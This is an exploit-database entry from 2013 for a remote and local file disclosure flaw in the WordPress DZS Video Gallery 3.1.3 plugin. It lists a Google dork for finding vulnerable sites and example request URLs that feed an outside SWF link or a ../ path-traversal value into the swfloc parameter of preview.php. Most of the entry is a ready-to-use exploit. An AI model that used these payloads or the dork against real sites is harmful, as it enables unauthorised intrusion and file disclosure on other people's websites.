WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability

2013-12-07T00:00:00
ID 1337DAY-ID-21626
Type zdt
Reporter aceeeeeeeer
Modified 2013-12-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: WordPress DZS Video Gallery (dzs-videogallery) 3.1.3 Plugins Remote and Local File Disclosure Vulnerability (only .SWF)
# Google Dork: inurl:/wp-content/plugins/dzs-videogallery/
# Vendor Homepage: http://digitalzoomstudio.net/
# Version: ALL
# Affected File: preview.php
# Date: 03/12/2013
# Exploit Author: aceeeeeeeer
# Contact: http://www.twitter.com/aceeeeeeeer
# Tested on: Linux
 
Exploit:
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=[
SWF LINK ]
 
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=http://www.cristgaming.com/pirate.swf
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../uploads/2013/12/The_Exorcist.swf

#  0day.today [2018-01-03]  #